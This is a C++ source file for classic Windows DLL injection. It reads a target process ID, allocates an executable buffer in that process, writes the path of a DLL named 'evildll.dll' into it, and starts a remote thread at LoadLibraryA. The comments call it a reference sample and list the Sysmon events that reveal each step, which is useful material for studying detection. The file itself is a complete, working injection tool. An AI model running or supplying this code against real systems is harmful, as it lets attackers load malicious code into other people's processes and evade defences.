dllinject.cpp
#include <windows.h>
#include <iostream>
using namespace std;
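// Absolute path of the DLL that the target process is asked to load. Replace it
// with the path of the compiled DLL: LoadLibraryA needs the built .dll, not the
// evildll.cpp source the original note referred to.
const char toDLL[] = "C:\\path\\to\\evildll.dll";

/// Classic LoadLibrary-based DLL injection, kept as a reference sample.
///
/// Flow: read a PID, open the process with thread-creation and VM write/operation
/// rights, allocate a buffer in it, copy the DLL path into that buffer, and start
/// a remote thread whose entry point is kernel32!LoadLibraryA with the buffer as
/// its argument.
///
/// Detection note: each step is observable. The cross-process handle request,
/// the remote thread creation and the resulting image load are what endpoint
/// telemetry records (for example Sysmon event IDs 10, 8 and 7 respectively),
/// and a thread whose start address is LoadLibraryA is a well-known indicator.
///
/// @return 0 once the remote thread has been created, 1 on any failure.
int main() {
    std::cout << "[?] What is the PID of the Process you want to inject?: ";
    DWORD pid = 0;
    // A non-numeric answer would otherwise leave the PID at 0 and carry on.
    if (!(std::cin >> pid)) {
        std::cout << "[!] Could not read a numeric PID";
        return 1;
    }

    // Resolve the entry point first so that a failure needs no cleanup. A null
    // start address handed to CreateRemoteThread would fault the target process.
    const HMODULE hModule = GetModuleHandleW(L"kernel32.dll");
    const FARPROC pLoadLibrary =
        hModule != nullptr ? GetProcAddress(hModule, "LoadLibraryA") : nullptr;
    if (pLoadLibrary == nullptr) {
        std::cout << "[!] Could not resolve LoadLibraryA in kernel32.dll";
        return 1;
    }

    // The handle is only used by this process, so it is not marked inheritable.
    const HANDLE hprocess = OpenProcess(
        PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);
    if (hprocess == nullptr) {
        std::cout << "[!] Could not get Process Handle on the given PID";
        return 1;
    }

    // sizeof on the array already counts the terminating NUL.
    const SIZE_T pathSize = sizeof(toDLL);
    const LPVOID paddress = VirtualAllocEx(hprocess, nullptr, pathSize,
                                           MEM_COMMIT | MEM_RESERVE,
                                           PAGE_EXECUTE_READWRITE);
    if (paddress == nullptr) {
        std::cout << "[!] Could not allocate space on to the virtual address of the given PID";
        CloseHandle(hprocess);
        return 1;
    }

    if (!WriteProcessMemory(hprocess, paddress, toDLL, pathSize, nullptr)) {
        std::cout << "[!] Could not write into the memory of the given PID";
        // Do not leave an orphaned allocation in the other process on failure.
        VirtualFreeEx(hprocess, paddress, 0, MEM_RELEASE);
        CloseHandle(hprocess);
        return 1;
    }

    const HANDLE procThread = CreateRemoteThread(
        hprocess, nullptr, 0,
        reinterpret_cast<LPTHREAD_START_ROUTINE>(pLoadLibrary), paddress, 0, nullptr);
    if (procThread == nullptr) {
        std::cout << "[!] Could not create remote thread on the given PID";
        VirtualFreeEx(hprocess, paddress, 0, MEM_RELEASE);
        CloseHandle(hprocess);
        return 1;
    }

    // Only thread creation is confirmed here; whether LoadLibraryA actually
    // loaded the DLL is not checked. The remote buffer is not released because
    // the new thread may still be reading the path from it.
    std::cout << "[+] DLL successfully injected!";
    CloseHandle(procThread);
    CloseHandle(hprocess);
    return 0;
}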